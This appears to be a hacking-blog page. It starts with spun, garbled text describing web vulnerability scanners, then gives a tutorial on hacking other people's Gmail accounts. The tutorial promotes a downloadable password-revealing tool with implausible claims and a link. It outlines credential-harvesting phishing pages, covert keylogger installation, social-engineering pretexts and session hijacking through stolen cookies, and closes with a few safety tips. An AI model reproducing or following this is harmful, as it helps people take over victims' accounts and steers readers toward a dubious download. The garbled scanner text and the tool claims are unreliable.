Nikto is an Open Source (GPL) web server scanner which performs far reaching tests against web servers for numerous things, including more than 6700 conceivably perilous documents/programs, checks for obsolete adaptations of more than 1250 servers, and rendition particular issues on more than 270 servers.

 

 

It additionally checks for server arrangement things, for example, the nearness of various record documents, HTTP server choices, and will endeavor to distinguish introduced web servers and programming.

Output things and modules are as often as possible refreshed and can be naturally refreshed.

Complete working with Nikto Here

Watcher

Watcher is an uninvolved web security scanner.

It doesn’t assault with heaps of solicitations or creep the objective site.

It is not a different apparatus but rather is an extra of Fiddler.

So you have to first introduce Fiddler and afterward introduce Watcher to utilize it.

 

 

 

It discreetly examines the demand and reaction from the client communication and afterward makes a provide details regarding the application.

As it is an inactive scanner, it won’t influence the site’s facilitating or cloud framework.

 

So I Hope this Article Helps You.

Try these Vulnerability scanners and let me know about your experiences in the comment section below.

Happy Hacking…

 

How to Hack Gmail Account Password In Minutes Online ?! : Guide

2
How to Hack A Gmail Account Password In Minutes [All Methods Described] ?! : Tutorial

Right in this Article, I’m Going to Show you Different ways in which Gmail account password can be Hacked!!

On Internet , 95%  of the Tools we Find on many Websites are Hopeless.

It Doesn’t mean that there is no way to hack Gmail, Yes there are few ways that can apt for Hacking.

Gmail Hacking

Gmail is a free Web-based e-mail service currently being tested at Google that provides users with a gigabyte of storage for messages and provides the ability to search for specific messages.

The Gmail program also automatically organizes successively related messages into a conversational thread.

Ways to Hack Gmail Account Password!

I’ll show you 5 ways to hack a Gmail Account:

PASS BREAKER

PASS BREAKER is the only legit tool available on the internet that can really hack a Gmail account. Developed by a hacker, it is used by thousands of users per day who want to hack Gmail passwords. Today, the only quick and efficient solution is PASS BREAKER. This app is unique because it is smartphone, tablet and computer compatible.

Here is how it works:

Once you have downloaded it and run it, PASS BREAKER will only require a Gmail email address to hack the password and show it on the screen of your device.

You can download PASS BREAKER here: https://www.passwordrevelator.net/en/passbreaker.php

  • NOTE: HackeRoyale does NOT claim or guarantee about the proper working or functioning of this tool. These are purely views of the author & in no way related to HackeRoyale’s own views or interests. Please think twice before taking any step further. HackeRoyale will NOT be responsible in any manner for if the tool doesn’t work as per the expectations. We DO NOT guarantee the authenticity or legitimacy of the tool. Hence, beware!

Phishing 

Phishing still remains to be an extremely effective way for hackers to steal login credentials, payment card information, and a multitude of other types of data.

Watch Our Exclusive video on GMAIL Phishing below, to explore more! 

Essentially, the hacker tries to setup a website that looks and behaves exactly like another website – which, in this scenario, is Gmail.

How to Hack A Gmail Account Password In Minutes [All Methods Described] ?! : Tutorial

All the attacker really needs to do is copy the web code from the login screen, add a small amount of PHP code, and then harvest usernames and passwords.

After the false phishing site has been setup, the hacker then sends links of the bogus site to all of their victims.

A careless user won’t see that the URL is slightly different and will consequently send their username and password straight into the hands of the attacker.

Then the phishing site typically redirects the user to the genuine site to avoid suspicion.

Though there are a lot of phishing filters and web URL blacklists that attempt to stamp out phishing, there are always new phishing sites popping up, and there is nothing we can do to eliminate them completely.

Keyloggers

A keylogger is probably one of the most effective and popular ways to hack information.

A keylogger is a type of software that runs in the background of the target’s computer, recording every single keystroke they enter.

Though many advanced hackers employ complex methods of installing keyloggers remotely, such as embedding the program in a P2P file download or other type of software, even novices can install these programs if they have access to the target’s computer.

However, some keylogger programs have tools that help the attacker complete the installation remotely, such as Realtime-Spy.

And hardware keyloggers are even easier to install, because they typically look like a PS2 jack of USB flash drive that can easily be inserted into the back of a desktop computer – without the target being any wiser.

Many of them are even undetectable by the latest anti-virus and anti-spyware software.

How to Hack A Gmail Account Password In Minutes [All Methods Described] ?! : Tutorial

Social Engineering

Social engineering has remained another effective alternative for hackers to steal users’ login credentials.

The idea is to impersonate another individual or to dupe the target into willingly forfeiting their login credentials, and there are several ways to do this.

The first way is to create a false account that has an address that looks like it belongs to a friend, acquaintance, or colleague of the victim.

Then there are a variety of lies a hacker can tell, like they need your login information to recover their account, etc.

In addition, hackers often mimic administrators or Google employees in an effort to garner more trust from their victims.

Some spam emails claim that Google was recently hacked and that they need your username and password to check if your account has been compromised.

But Google employees will never ask you for your account information, so remember that you should never hand over your login credentials to a third party – even if they seem to be legitimate.

Stealing Cookies

There are a number of ways to steal cookies from other users’ sessions and to inject the into your own web browser.

Tools like Firecookie, Wireshark Cookie Injector, GreasMonkey for Firefox, and a myriad of other tools will allow you to sniff out a cookie on the local LAN and then use that cookie to hijack the user’s session.

Also read : How to hack Facebook in a minute !

The easiest place for a hacker to perform this attack is on public Wi-Fi networks like those found at cafes, but some hackers engage in war driving to find weak or exposed wireless networks.

The bottom line is that once the cookie has been stolen, the attacker can then login to the account and read emails, send emails, and change account settings to block the original user.

Things we need to follow to Reduce the chances of being Hacked !

  • First and foremost, make sure you never give your password out to another individual even if they’re your friend.
  • Always make sure that you log out of Gmail when you are finished perusing your email to avoid becoming the victim of session hijacking.
  • Everyone should be regularly scanning their computer with antivirus and antispyware software to help decrease the chance of becoming infected with a keylogger and other similar types of dubious programs that lead to someone hacking your Gmail account.

I hope this article Helps You a lot. Comment your queries or feedback below! 😉